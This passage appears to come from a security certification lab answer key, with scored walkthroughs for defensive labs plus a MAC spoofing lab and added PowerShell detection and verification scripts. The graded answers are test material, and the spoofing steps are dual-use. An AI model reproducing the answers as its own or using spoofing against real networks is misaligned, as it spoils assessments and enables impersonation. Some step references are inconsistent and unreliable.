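        [object] $Record
    )
    process {
        $key = '{0}/{1}' -f $Record.LogName, $Record.Id
        if ($TamperSignatures.ContainsKey($key)) {
            [pscustomobject]@{
                TimeCreated = $Record.TimeCreated
                LogName     = $Record.LogName
                Id          = $Record.Id
                Finding     = $TamperSignatures[$key]
                Detail      = $Record.Message
            }
        }
    }
}

function Test-TamperBurst {
    # True when two findings fall within $WindowMinutes of each other,
    # for example a policy change followed shortly by a log clear.
    param([object[]] $Finding, [int] $WindowMinutes = 10)
    $sorted = @($Finding | Sort-Object TimeCreated)
    for ($i = 1; $i -lt $sorted.Count; $i++) {
        $gap = $sorted[$i].TimeCreated - $sorted[$i - 1].TimeCreated
        if ($gap.TotalMinutes -le $WindowMinutes) { return $true }
    }
    return $false
}

# Constructed sample records (not real log data).
$sample = @(
    [pscustomobject]@{ LogName = 'Security'; Id = 4624; TimeCreated = [datetime]'2023-12-06T09:00:00'; Message = 'An account was successfully logged on.' }
    [pscustomobject]@{ LogName = 'Security'; Id = 4719; TimeCreated = [datetime]'2023-12-06T09:02:10'; Message = 'System audit policy was changed.' }
    [pscustomobject]@{ LogName = 'System';   Id = 104;  TimeCreated = [datetime]'2023-12-06T09:03:30'; Message = 'The Application log file was cleared.' }
    [pscustomobject]@{ LogName = 'System';   Id = 104;  TimeCreated = [datetime]'2023-12-06T09:03:41'; Message = 'The System log file was cleared.' }
    [pscustomobject]@{ LogName = 'System';   Id = 7036; TimeCreated = [datetime]'2023-12-06T09:05:00'; Message = 'A service entered the running state.' }
)

$findings = @($sample | Find-LogTampering)
$findings | Format-Table TimeCreated, LogName, Id, Finding, Detail -AutoSize

if (Test-TamperBurst -Finding $findings) {
    Write-Warning 'Multiple tampering indicators within 10 minutes.'
}

# On a live host (elevated), feed real records instead of the sample:
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security','System'; Id = 4719,1102,104 } `
#       -ErrorAction SilentlyContinue | Find-LogTampering
```

Forward these events to a central collector so the record is still available when the local logs on the host have been cleared.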
QUESTION 3:
You are the IT security administrator for a small corporate network.
Recently, some of your firm's proprietary data leaked online. You have
been asked to use steganography to encrypt data into a file that will
be shared with a business partner. The data will allow you to track the
source if the information is leaked again.
In this lab, your task is to use OpenStego to hide data inside a picture
file as follows:
• Encrypt the user data found in John.txt into gear.png.
• Save the output file into the Documents folder as send.png.
• Password protect the file with NoMor3L3@ks! as the password.
• Confirm the functionality of the steganography by extracting the data from send.png into the Exports folder and opening the file to view the hidden user data.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 3 minutes 21 seconds
Required Score: 100%
Task Summary
Required Actions
Encrypt John.txt into send.png and save it in the Documents folder
Password protect the file with the password NoMor3L3@ks!
Confirm the functionality of the steganography
File created
File opened
Explanation
In this lab, your task is to use OpenStego to hide data inside a picture file as follows:
• Encrypt the user data found in John.txt into gear.png.
• Save the output file into the Documents folder as send.png.
• Password protect the file with NoMor3L3@ks! as the password.
• Confirm the functionality of the steganography by extracting the data from send.png into the Exports folder and opening the file to view the hidden user data.
Complete this lab as follows:
1. Encrypt the user data into the file to be shared as follows:
   a. In the search field on the taskbar, type OpenStego.
   b. Under Best match, select OpenStego.
   c. In the Message File field, select the ellipses at the end of the field.
   d. Select John.txt.
   e. Select Open.
   f. In the Cover File field, select the ellipses at the end of the field.
   g. Select the gear.png file.
   h. Select Open.
   i. In the Output Stego File field, select the ellipses at the end of the field.
   j. In the File name field, enter send.png.
   k. Select Open.
2. Password protect the file as follows:
   a. In the Password field, enter NoMor3L3@ks!
   b. In the Confirm Password field, enter NoMor3L3@ks!
   c. Select Hide Data.
   d. Select OK.
3. Extract the data and open the file as follows:
   a. Under Data Hiding, select Extract Data.
   b. In the Input Stego File field, select the ellipses.
   c. Select the send.png file with the encryption.
   d. Select Open.
   e. In the Output Folder for Message File field, select the ellipses.
   f. Double-click Export to set it as the destination of the output file.
   g. Click Select Folder.
   h. In the Password field, enter NoMor3L3@ks! as the password.
   i. Select Extract Data.
   j. Select OK.
   k. From the taskbar, open File Explorer.
   l. Double-click Documents to navigate to the folder.
   m. Double-click Export to navigate to the folder.
   n. Double-click John.txt to open the output file and verify that the decryption process was successful.
QUESTION 4:
As an IT administrator, you need to know how security breaches are
caused. You know that SMAC is used for MAC spoofing, so you are
going to spoof your MAC address.
In this lab, your task is to complete the following:
• On Office2 use ipconfig /all and find the IP address and MAC address.
• Spoof the MAC address on ITAdmin to that of Office2 using SMAC.
• Refresh your MAC and IP addresses to match the target machine.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 3 minutes 6 seconds
Required Score: 100%
Task Summary
Required Actions
Use ipconfig /all on Office2 to get the IP and MAC addresses
Spoof the MAC address of ITAdmin
Update the IP address on ITAdmin
Explanation
In this lab, your task is to complete the following:
• On Office2 use ipconfig /all and find the IP address and MAC address.
• Spoof the MAC address on ITAdmin to that of Office2 using SMAC.
• Refresh your MAC and IP addresses to match the target machine.
Complete this lab as follows:
1. Find the IP address and MAC address as follows:
   a. Right-click Start and select Windows PowerShell (Admin).
   b. At the command prompt, type ipconfig /all and press Enter.
   c. Find the MAC address and the IP address.
2. Spoof the MAC address as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under IT Administration, select ITAdmin.
   c. In the search bar, type SMAC.
   d. Under Best match, right-click SMAC and select Run as administrator.
   e. In the New Spoofed Mac Address field, type 00:00:55:55:44:15 for the MAC address from Office2.
   f. Select Update MAC.
   g. Select OK to restart the adapter.
3. Refresh your MAC and IP addresses as follows:
   a. Right-click Start and select Windows PowerShell (Admin).
   b. At the command prompt, type ipconfig /all to confirm the MAC address has been updated.
   c. Type ipconfig /renew to update the IP address.
A.2.5 Pro Domain 5: Defend a System
QUESTION 1:
You work at a penetration testing consulting company. Through
reconnaissance, it was found that your website is broadcasting banner
information. Your manager wants you to hide the IIS banners.
In this lab, your task is to configure the IIS web server to stop
broadcasting banners by removing HTTP response headers from the
CorpNet.xyz website.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status: Pass
Elapsed Time: 22 seconds
Required Score: 100%
Task Summary
Required Actions
Remove HTTP response headers from the CorpNet.xyz site
Remove the X-Powered-By header
Remove the X-Frame-Options header
Explanation
In this lab, your task is to configure the IIS web server to stop broadcasting banners by removing HTTP response headers from the CorpNet.xyz website.
Complete this lab as follows:
1. In Server Manager, select Tools > Internet Information Services (IIS) Manager.
2. In the left pane, expand CorpWeb(CorpNet.xyz\Administrator) Home.
3. Expand Sites.
4. Select CorpNet.xyz.
5. Double-click HTTP Response Headers.
6. Select a response header.
7. Under Actions, select Remove.
8. Click Yes to confirm.
9. Repeat steps 6–8 for each response header.
QUESTION 2:
You are the IT security administrator for a small corporate network.
Several of your users have reported that they are unable to connect to
the network. After examining their computers, they all seem to be
getting bad IP address information from a rogue DHCP server.
In this lab, your task is to identify the rogue DHCP server using
Wireshark:
• Use Wireshark to capture and filter DHCP traffic.
• Disable and enable the enp2s0 network interface to request a new IP address from the DHCP server.
• Find the rogue DHCP server.
• Answer the questions.
“Use bootp in Wireshark to isolate DHCP traffic. Use the Exhibit to determine the IP address range used by the legitimate DHCP server.”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 2 minutes 14 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Capture and filter DHCP traffic
Disable and enable the enp2s0 network interface
Q1 What is the IP address of the rogue DHCP server?
Q2 What is the IP address of the legitimate DHCP server?
Explanation
In this lab, your task is to identify the rogue DHCP server using Wireshark:
• Use Wireshark to capture and filter DHCP traffic.
• Disable and enable the enp2s0 network interface to request a new IP address from the DHCP server.
• Find the rogue DHCP server.
• Answer the questions.
Complete this lab as follows:
1. Use Wireshark to capture and filter DHCP traffic as follows:
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
   d. In the Apply a display filter field, type bootp and press Enter.
2. Disable and enable the enp2s0 network interface as follows:
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ip addr show and press Enter to view the current IP configuration.
   c. Type ip link set enp2s0 down and press Enter.
   d. Type ip link set enp2s0 up and press Enter to enable the interface and request an IP address from the DHCP server.
3. Maximize the window for easier viewing.
4. In Wireshark, under the Source column, find the IP addresses of the rogue and legitimate DHCP servers that sent the DHCP Offer packets.
5. In the top right, select Answer Questions.
6. Answer the questions.
7. Select Score Lab.
Lab Questions:
1. What is the IP address of the rogue DHCP server?
   a. 10.10.10.240
2. What is the IP address of the legitimate DHCP server?
   a. 192.168.0.14
QUESTION 3:
You are the IT administrator for a small corporate network. The
receptionist, Maggie Brown, uses an iPad to manage employee
schedules and messages. You need to help her make the iPad more
secure. The current simple passcode is 1542.
In this lab, your task is to:
• Set a secure passcode on the iPad as follows:
  o Require a passcode: After 5 minutes
  o New passcode: KeepOutOfMyPad
  o Configure the iPad to erase data after 10 failed passcode attempts.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 52 seconds
Required Score: 100%
Task Summary
Required Actions
Set a secure passcode on the iPad
Turn off Simple Passcode
Passcode: KeepOutOfMyPad
Set Require a passcode to after 5 minutes
Set Erase Data to after 10 failed password attempts.
Explanation
In this lab, your task is to:
• Set a secure passcode on the iPad as follows:
  o Require a passcode: After 5 minutes
  o New passcode: KeepOutOfMyPad
• Configure the iPad to erase data after 10 failed passcode attempts.
Complete this lab as follows:
1. Set a secure passcode on the iPad as follows:
   a. Select Settings.
   b. From the left menu, select Touch ID & Passcode.
   c. Enter 1542 for the passcode.
   d. Select Require Passcode.
   e. Select After 5 minutes.
   f. At the top, select Passcode Lock.
   g. Next to Simple Passcode, slide the switch to turn off simple passcodes.
   h. Enter 1542 for the passcode.
   i. Enter KeepOutOfMyPad as the new passcode.
   j. Select Next.
   k. Enter KeepOutOfMyPad to re-enter the new passcode.
   l. Select Done.
2. Configure the iPad to erase data after 10 failed passcode attempts as follows:
   a. On the Touch ID & Passcode page next to Erase Data, slide the switch to enable Erase Data.
   b. Select Enable.
QUESTION 4:
You are the IT administrator for a small corporate network. The
company has a single Active Directory domain named CorpNet.xyz.
You need to increase the domain's authentication security. You need
to make sure that User Account Control (UAC) settings are consistent
throughout the domain and in accordance with industry
recommendations.
In this lab, your task is to configure the following UAC settings in the
Default Domain Policy on CorpDC as follows:
User Account Control | Setting
Admin Approval Mode for the Built-in Administrator account | Enabled
Allow UIAccess applications to prompt for elevation without using the secure desktop | Disabled
Behavior of the elevation prompt for administrators in Admin Approval mode | Prompt for credentials
Behavior of the elevation prompt for standard users | Automatically deny elevation requests
Detect application installations and prompt for elevation | Enabled
Only elevate UIAccess applications that are installed in secure locations | Enabled
Only elevate executables that are signed and validated | Disabled
Run all administrators in Admin Approval Mode | Enabled
Switch to the secure desktop when prompting for elevation | Enabled
Virtualize file and registry write failures to per-user locations | Enabled
“User Account Control policies are set in a GPO linked to the domain. In this scenario, edit the Default Domain Policy and configure settings in the following path: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options”
Your Performance
Your Score: 10 of 10 (100%)
Pass Status: Pass
Elapsed Time: 2 minutes 59 seconds
Required Score: 100%
Task Summary
Required Actions
Admin Approval Mode for the Built-in Administrator account: Enabled
Allow UIAccess applications to prompt for elevation without using the secure desktop: Disabled
Behavior of the elevation prompt for administrators in Admin Approval mode: Prompt for credentials
Behavior of the elevation prompt for standard users: Automatically deny elevation requests
Detect application installations and prompt for elevation: Enabled
Only elevate UIAccess applications that are installed in secure locations: Enabled
Only elevate executables that are signed and validated: Disabled
Run all administrators in Admin Approval Mode: Enabled
Switch to the secure desktop when prompting for elevation: Enabled
Virtualize file and registry write failures to per-user locations: Enabled
Explanation
In this lab, your task is to configure the following UAC settings in the Default Domain Policy on
CorpDC as follows:
User Account Control | Setting
Admin Approval Mode for the Built-in Administrator account | Enabled
Allow UIAccess applications to prompt for elevation without using the secure desktop | Disabled
Behavior of the elevation prompt for administrators in Admin Approval mode | Prompt for credentials
Behavior of the elevation prompt for standard users | Automatically deny elevation requests
Detect application installations and prompt for elevation | Enabled
Only elevate UIAccess applications that are installed in secure locations | Enabled
Only elevate executables that are signed and validated | Disabled
Run all administrators in Admin Approval Mode | Enabled
Switch to the secure desktop when prompting for elevation | Enabled
Virtualize file and registry write failures to per-user locations | Enabled
Complete this lab as follows:
1. From Hyper-V Manager, select CORPSERVER.
2. Right-click CorpDC and select Connect.
3. From Server Manager, select Tools > Group Policy Management.
4. Maximize the window for easier viewing.
5. Expand Forest: CorpNet.local.
6. Expand Domains.
7. Expand CorpNet.local.
8. Right-click Default Domain Policy and select Edit.
9. Maximize the window for easier viewing.
10. Under Computer Configuration, expand Policies.
11. Expand Windows Settings.
12. Expand Security Settings.
13. Expand Local Policies.
14. Select Security Options.
15. In the right pane, right-click the policy you want to edit and select Properties.
16. Select Define this policy setting.
17. Select Enable or Disable as necessary.
18. Edit the value for the policy as needed and then click OK.
19. Repeat steps 8–11 for each policy setting.
QUESTION 5:
You are the IT administrator for a small corporate network. You are
attempting to improve the password security of the Windows 10 laptop
in the Lobby.
In each policy, the Explain tab provides a description of the effects of
the policy to help you identify which policy to configure with which
value.
In this lab, your task is to use the Local Security Policy tool to
configure password restrictions as follows:
• Passwords must be at least 10 characters long.
• Passwords must be changed every 30 days.
• New passwords cannot be the same as the previous four passwords.
• New passwords cannot be changed for at least two days.
• Passwords must contain non-alphabetical characters.
• Lock the user account after four incorrect logon attempts within a 30-minute period.
• Automatically unlock locked accounts after one hour.
“Policy changes will not be enforced within the simulation.”
Your Performance
Your Score: 8 of 8 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 4 seconds
Required Score: 100%
Task Summary
Required Actions
Require passwords of 10 characters or more
Force password changes every 30 days
Remember the last 4 passwords
Do not allow password changes within 2 days
Require complex passwords
Lock accounts after 4 invalid attempts
Count bad logon attempts within a 30 minute period
Unlock locked accounts after 60 minutes
Explanation
In this lab, your task is to edit the local security policy and configure settings as follows:
Policy Location | Policy | Setting
Account Policies/Password Policy | Enforce password history | 4
Account Policies/Password Policy | Maximum password age | 30
Account Policies/Password Policy | Minimum password age | 2
Account Policies/Password Policy | Minimum password length | 10
Account Policies/Password Policy | Passwords must meet complexity requirements | Enabled
Account Policies/Account Lockout Policy | Account lockout threshold | 4
Account Policies/Account Lockout Policy | Account lockout duration | 60
Account Policies/Account Lockout Policy | Reset account lockout counter after | 30
Complete this lab as follows:
1. Select Start.
2. Select Windows Administrative Tools.
3. Select Local Security Policy.
4. In the left pane, expand Account Policies.
5. Select Password Policy.
6. Double-click the policy you want to configure.
7. Configure the policy settings.
8. Click OK.
9. Repeat steps 6–8 to configure additional policies.
10. Select Account Lockout Policy.
11. Repeat steps 6–8 to configure policy settings.
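A command-line check of the result of this lab, as an added example that is not part of the TestOut lab: it parses net accounts output and compares each value with the settings in the table above. The function name Compare-AccountPolicy and the sample output are constructed; net accounts does not report the complexity requirement, so that setting is not covered.

```powershell
# Added example, not part of the lab. The baseline holds the values this lab
# configures, keyed by the labels that `net accounts` prints.
$Baseline = [ordered]@{
    'Minimum password age (days)'           = 2
    'Maximum password age (days)'           = 30
    'Minimum password length'               = 10
    'Length of password history maintained' = 4
    'Lockout threshold'                     = 4
    'Lockout duration (minutes)'            = 60
    'Lockout observation window (minutes)'  = 30
}

function Compare-AccountPolicy {
    param([Parameter(Mandatory)][string[]] $NetAccountsOutput)

    # Parse "Label:     value" lines into a lookup table.
    $actual = @{}
    foreach ($line in $NetAccountsOutput) {
        if ($line -match '^(?<label>.+?):\s+(?<value>\S.*)$') {
            $actual[$Matches.label.Trim()] = $Matches.value.Trim()
        }
    }

    # One result row per baseline entry. Non-numeric values such as
    # "Never" or "None" mean the control is switched off, so they fail.
    foreach ($name in $Baseline.Keys) {
        $value = $actual[$name]
        [pscustomobject]@{
            Policy    = $name
            Expected  = $Baseline[$name]
            Actual    = $value
            Compliant = ($value -match '^\d+$') -and ([int]$value -eq $Baseline[$name])
        }
    }
}

# Constructed sample output (two settings deliberately off baseline).
$sample = @'
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          2
Maximum password age (days):                          30
Minimum password length:                              8
Length of password history maintained:                4
Lockout threshold:                                    Never
Lockout duration (minutes):                           60
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
'@ -split '\r?\n'

Compare-AccountPolicy -NetAccountsOutput $sample | Format-Table -AutoSize

# On a live machine: Compare-AccountPolicy -NetAccountsOutput (net accounts)
```

The comparison is an exact match against the lab's values, so a stricter setting than the lab's is also reported as not compliant.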
QUESTION 6:
You are the IT administrator at a small corporate office. You just
downloaded a new release for a program you use. You need to make
sure the file was not altered before you received it. Another file
containing the original file hash was also downloaded. The files are
located in C:\Downloads.
In this lab, your task is to use MD5 hash files to confirm that the
Release.zip file was unaltered as follows:
• Use Windows PowerShell to generate a file hash for Release.zip.
• Examine the release821hash.txt file for the original hash.
• Compare the original hash of the Release.zip file to its calculated hash in PowerShell to see if they match.
  At the prompt, type "calculated hash" -eq "known hash" and press Enter. The calculated hash is the hash generated by the get-filehash file_name -a md5 command and the known hash is the hash generated by the get-content file_name.txt command. Remember to include the quotation marks and the file extensions with the file names in the commands.
“You can highlight text in PowerShell and right-click it to copy the text to the active line.”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 36 seconds
Required Score: 100%
Task Summary
Lab Questions
Use the command get-filehash Release.zip -a md5
Use the command get-content release821hash.txt
Use the -eq command to compare the hashes
Q1 Do the file hashes match?
Explanation
In this lab, your task is to use MD5 hash files to confirm that the Release.zip file was unaltered as
follows:
• Use Windows PowerShell to generate a file hash for Release.zip.
• Examine the release821hash.txt file for the original hash.
• Compare the original hash of the Release.zip file to its calculated hash in PowerShell to see if they match.
Complete this lab as follows:
1. Right-click Start and select Windows PowerShell (Admin).
2. At the prompt, type cd \downloads and press Enter to navigate to the directory that contains the files.
3. Type dir and press Enter to view the available files.
4. Type get-filehash Release.zip -a md5 and press Enter to view the MD5 hash.
5. Type get-content release821hash.txt and press Enter to view the known hash contained in the .txt file.
6. Type "calculated hash" -eq "known hash" and press Enter to determine if the file hashes match.
7. In the top right, select Answer Questions.
8. Answer the question.
9. Select Score Lab.
Lab Questions:
1. Do the file hashes match?
   1. No
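The comparison from this lab as a reusable function, as an added example that is not part of the TestOut lab. Test-ReleaseHash and the temporary files it runs against are constructed; the function accepts hash files that also carry a file name or use a different letter case, and the algorithm is a parameter so the same check works with SHA256.

```powershell
# Added example, not part of the lab.
function Test-ReleaseHash {
    param(
        [Parameter(Mandatory)][string] $Path,      # file to verify
        [Parameter(Mandatory)][string] $HashFile,  # text file with the known hash
        [ValidateSet('MD5', 'SHA1', 'SHA256', 'SHA384', 'SHA512')]
        [string] $Algorithm = 'MD5'                # MD5 to match the lab
    )

    # Expected number of hex characters for each algorithm.
    $hexLength = @{ MD5 = 32; SHA1 = 40; SHA256 = 64; SHA384 = 96; SHA512 = 128 }[$Algorithm]

    # Pull the first hex run of exactly that length out of the hash file, so
    # "hash  filename" lines and trailing whitespace do not break the check.
    $pattern = '(?<![0-9A-Fa-f])[0-9A-Fa-f]{' + $hexLength + '}(?![0-9A-Fa-f])'
    $text    = Get-Content -LiteralPath $HashFile -Raw
    $found   = [regex]::Match($text, $pattern)
    if (-not $found.Success) {
        throw "No $Algorithm hash found in $HashFile"
    }

    $known      = $found.Value.ToUpperInvariant()
    $calculated = (Get-FileHash -LiteralPath $Path -Algorithm $Algorithm).Hash

    [pscustomobject]@{
        File       = $Path
        Algorithm  = $Algorithm
        Known      = $known
        Calculated = $calculated
        Match      = ($calculated -eq $known)
    }
}

# Constructed demonstration files in a temporary folder.
$dir = Join-Path ([IO.Path]::GetTempPath()) ('hashdemo-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $dir | Out-Null
$zip = Join-Path $dir 'Release.zip'
$txt = Join-Path $dir 'release821hash.txt'

Set-Content -LiteralPath $zip -Value 'constructed release contents' -NoNewline
$recorded = (Get-FileHash -LiteralPath $zip -Algorithm MD5).Hash.ToLower()
Set-Content -LiteralPath $txt -Value "$recorded  Release.zip"

# File as recorded.
Test-ReleaseHash -Path $zip -HashFile $txt | Format-List

# Same file after a change was appended to it.
Add-Content -LiteralPath $zip -Value 'altered'
Test-ReleaseHash -Path $zip -HashFile $txt | Format-List

Remove-Item -LiteralPath $dir -Recurse -Force
```

A hash file downloaded alongside the release shows only that the two files agree with each other, and MD5 is collision-prone, so use -Algorithm SHA256 with a digest obtained from the publisher when one is available.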
QUESTION 7:
You work as the IT Security Administrator for a small corporate
network. The employee in Office 1 is working on a very sensitive
project. Management is concerned that if the hard drive in the
computer were stolen, sensitive information could be compromised.
As a result, you have been asked to encrypt the entire System
volume. The Office1 computer has a built-in TPM on the motherboard.
In this lab, your task is to configure BitLocker drive encryption as
follows:
• Turn on TPM in the BIOS.
• Activate TPM in the BIOS.
• Turn on BitLocker for the System (C:) drive.
• Save the recovery key to \\CorpServer\BU-Office1.
• Run the BitLocker system check.
• Encrypt the entire System (C:) drive.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Enable the TPM
Activate the TPM
Turn on BitLocker for the System (C:) drive
Save the recovery key on CorpServer
Encrypt the entire drive
Run BitLocker system check
Explanation
In this lab, your task is to configure BitLocker drive encryption as follows:
• Turn on TPM in the BIOS.
• Activate TPM in the BIOS.
• Turn on BitLocker for the Local Drive (C:) drive.
• Save the recovery key to \\CorpServer\BU-Office1.
• Run the BitLocker system check.
• Encrypt the entire Local Drive (C:) drive.
Complete this lab as follows:
1. In the search field on the taskbar, enter Control Panel.
2. Select System and Security.
3. Select BitLocker Drive Encryption.
4. Select Turn on BitLocker next to C:.
5. Notice, at the bottom of the window, that Windows indicates that a TPM was not found.
6. Select Cancel.
7. Select Start.
8. Select Power.
9. Select Restart to restart Office1 and activate TPM.
10. When the TestOut logo appears, press Delete to enter the BIOS.
11. Turn on and activate TPM as follows:
   a. In the left pane, expand Security.
   b. Select TPM Security.
   c. In the right pane, select TPM Security to turn TPM security on.
   d. Select Apply.
   e. Select Activate.
   f. Select Apply.
   g. Select Exit.
12. Turn on BitLocker as follows:
   a. After Office1 finishes rebooting, in the search field, enter Control Panel.
   b. Select System and Security.
   c. Select BitLocker Drive Encryption.
   d. Select Turn on BitLocker. Now Windows is able to begin the Drive Encryption setup.
   e. Select Next.
   f. Select Restart.
   g. Press F10.
   h. Select Next.
13. Save the recovery key to \\CorpServer\BU-Office1 as follows:
   a. Select Save to a file to back up your recovery key to a file.
   b. Browse the network to \\CorpServer\BU-Office1.
   c. Select Save.
   d. After your recovery key is saved, click Next.
14. Select Encrypt entire drive; then click Next.
15. Leave the default setting selected when choosing the encryption mode and click Next.
16. Select Run BitLocker system check; then click Continue.
17. Select Restart now.
18. When encryption is complete, click Close.
19. Open File Explorer and verify that the Local Disk (C:) drive shows the lock icon.
QUESTION 8:
You recognize that the threat of malware is increasing and have
implemented Windows Defender on the office computers.
In this lab, your task is to configure Windows Defender as follows:
• Add a file exclusion for D:\Graphics\cat.jpg.
• Add a process exclusion for welcome.scr.
• Update protection definitions before performing the scan.
• Perform a quick scan.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 2 minutes 2 seconds
Required Score: 100%
Task Summary
Required Actions
Add a file exclusion
Add a process exclusion
Update protection definitions before scanning
Perform a quick scan
Explanation
In this lab, your task is to configure Windows Defender as follows:
• Add a file exclusion for D:\Graphics\cat.jpg.
• Add a process exclusion for welcome.scr.
• Check for updates before you perform the scan.
• Perform a quick scan.
Complete this lab as follows:
1. Add a file exclusion as follows:
   a. In the search field on the taskbar, enter Windows Defender.
   b. Under Best match, select Windows Defender Security Center.
   c. Maximize the window for easier viewing.
   d. Select Virus & threat protection.
   e. Select Virus & threat protection settings.
   f. Under Exclusions, select Add or remove exclusions.
   g. Select the + (plus sign) next to Add an exclusion.
   h. From the drop-down lists, select File.
   i. Under This PC, select Data (D:).
   j. Double-click Graphics.
   k. Select cat.jpg.
   l. Select Open.
2. Add a process exclusion as follows:
   a. Select the + (plus sign) next to Add an exclusion.
   b. From the drop-down lists, select Process.
   c. In the Enter process name field, enter welcome.scr for the process name.
   d. Select Add.
3. Update protection definitions as follows:
   a. In the left menu, select the shield icon.
   b. Select Protection updates.
   c. Select Check for updates.
4. Perform a quick scan as follows:
   a. In the left menu, select the shield icon.
   b. Under Scan History, select Quick scan to run a quick scan now.
QUESTION 9:
You are enhancing your network's security, and you want to enable
Intrusion Detection and Prevention on the network security appliance
(NSA).
In this lab, your task is to:
• Enable the IPS on the LAN and DMZ interface.
• Manually update the IPS signature using C:\signatures\sbips000018.bin
• Use the following credentials to configure the NSA to automatically update the signature in the future:
  o Username: mary.r.brown
  o Password: Upd@teN0w (0 is a zero)
• Set the IPS policies to detect and prevent all known threats.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 3 minutes 38 seconds
Required Score: 100%
Task Summary
Required Actions
Enable IPS
Enable IPS for the LAN
Enable IPS for the DMZ
Update signature manually with SBIPS000018.bin
Set to update signature automatically
Automatically Update Signatures selected
User Name: mary.r.brown
Password: Upd@teN0w
Set IPS Policies to Detect and Prevent
Set Backdoor to Detect and Prevent
Set DOS to Detect and Prevent
Set Exploit to Detect and Prevent
Set FTP to Detect and Prevent
Set LDAP to Detect and Prevent
Set Shellcode to Detect and Prevent
Set SQL-DB to Detect and Prevent
Set TrojanVirus to Detect and Prevent
Set WebServer to Detect and Prevent
Explanation
In this lab, your task is to:
• Enable the IPS on the LAN and DMZ interface.
• Manually update the IPS signature using C:\signatures\sbips000018.bin
• Use the following credentials to configure the NSA to automatically update the signature in the future:
  o Username: mary.r.brown
  o Password: Upd@teN0w (0 is a zero)
• Set the IPS policies to detect and prevent all known threats.
Complete this lab as follows:
1. Enable IPS as follows:
   a. In the Security Appliance Configuration utility, select IPS.
   b. Under IPS Enable, select Enable IPS Protection for LAN.
   c. Select Enable IPS Protection for DMZ.
   d. Select Apply.
2. Update the IPS signature as follows:
   a. Under Manual Signature Updates, select Browse.
   b. Browse to and select C:\Signatures\SBIPS000018.bin.
   c. Select Open.
   d. Select Upload.
   e. Refresh the page to update the IPS Signatures status.
   f. Select Automatically Update Signatures.
   g. In the Cisco.com User Name field, enter mary.r.brown.
   h. In the Password field, enter Upd@teN0w (0 is a zero).
   i. Select Apply.
3. Configure IPS policies as follows:
   a. In the left menu, select IPS Policy.
   b. For each IPS Category, select Detect and Prevent.
   c. Select Apply.
QUESTION 10:
You are the IT security administrator for a small corporate network.
You are concerned about unauthorized activity in your DMZ, so you
decide to set up a honeypot to study hacking attempts.
In this lab, your task is to:
• Use Pentbox to create a honeypot on www_stage.
• Test the honeypot on Consult-Lap using www_stage.corpnet.xyz in Chrome.
• Verify the intrusion on www_stage.
• Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 59 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Create a honeypot on www_stage
Browse to the honeypot from Consult_Lap
Q1 What message is displayed?
Q2 What is the IP address associated with the intrusion attempt?
Explanation
Complete this lab as follows:
1. Use Pentbox to create a honeypot on www_stage as follows:
   a. From the Favorites bar, open Terminal.
   b. At the prompt, type cd pentbox-1.8 and press Enter to change to the pentbox directory.
   c. Type ./pentbox.rb and press Enter to start Pentbox.
   d. Type 2 and press Enter to select Network Tools.
   e. Type 3 and press Enter to select Honeypot.
   f. Type 1 and press Enter to select Fast Auto Configuration.
2. Test the honeypot using Chrome as follows:
   a. From the top navigation tabs, select Buildings.
   b. Under Red Cell, select Consult-Lap.
   c. From the task bar, open Chrome.
   d. In the URL field, enter www_stage.corpnet.xyz and press Enter.
   e. In the top right, select Answer Questions.
   f. Answer Question 1.
   g. Minimize the Lab Questions dialog.
3. Review the effects of the intrusion on www_stage as follows:
   a. From the top navigation tabs, select Buildings.
   b. Under Building A, select Basement.
   c. Under Basement, select www_stage.
      Notice the INTRUSION ATTEMPT DETECTED message at the bottom of the Pentbox window.
4. In the top right, select Answer Questions.
5. Answer Question 2.
6. Select Score Lab.
Lab Questions:
1. What message is being displayed?
   a. Access Denied
2. What is the IP address associated with the intrusion attempt?
   a. 147.191.29.25
QUESTION 11:
As part of your ethical hacking testing, you determined that you can
obtain the zone information from the CorpDC3 server, which is a
domain controller in the CorpNet.local domain. This server holds an
Active Directory-integrated zone for the CorpNet.local domain.
You have recommended that the company secure zone data to
prevent anyone from copying zone data from the CorpDC3 server
through zone transfer.
In this lab, your task is to disable zone transfers for the CorpNet.local
zone.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 51 seconds
Required Score: 100%
Task Summary
Required Actions
Disable zone transfers for the CorpNet.local zone
Explanation
In this lab, your task is to disable zone transfers for the CorpNet.local zone.
Complete this lab as follows:
1. From Server Manager, select Tools > DNS.
2. In the left pane, expand CORPDC3.
3. Expand Forward Lookup Zones.
4. Right-click CorpNet.local and select Properties.
5. Select the Zone Transfers tab.
6. Deselect Allow zone transfers.
7. Click OK.
QUESTION 12:
You are the IT security administrator for a small corporate network.
You have had problems with users installing remote access services
like Remote Desktop Services and TeamViewer. You need to disable
and stop these services.
In this lab, your task is to run a scan on the network with Zenmap to
ensure that there are no traces of any remote software running on the
network. Run the scan as follows:
• Scan the network for services running on port 3389, match the IP address to the computer name in the table, then disable and stop the Remote Desktop Services service on that computer.
• Scan the network for services running on port 5938, match the IP address to the computer name in the table, then disable and stop the TeamViewer service on that computer.

IP Address      Computer Name
